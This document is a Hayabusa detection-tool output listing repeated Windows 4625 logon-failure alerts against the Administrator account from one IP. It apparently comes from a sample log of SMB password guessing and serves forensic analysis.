2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
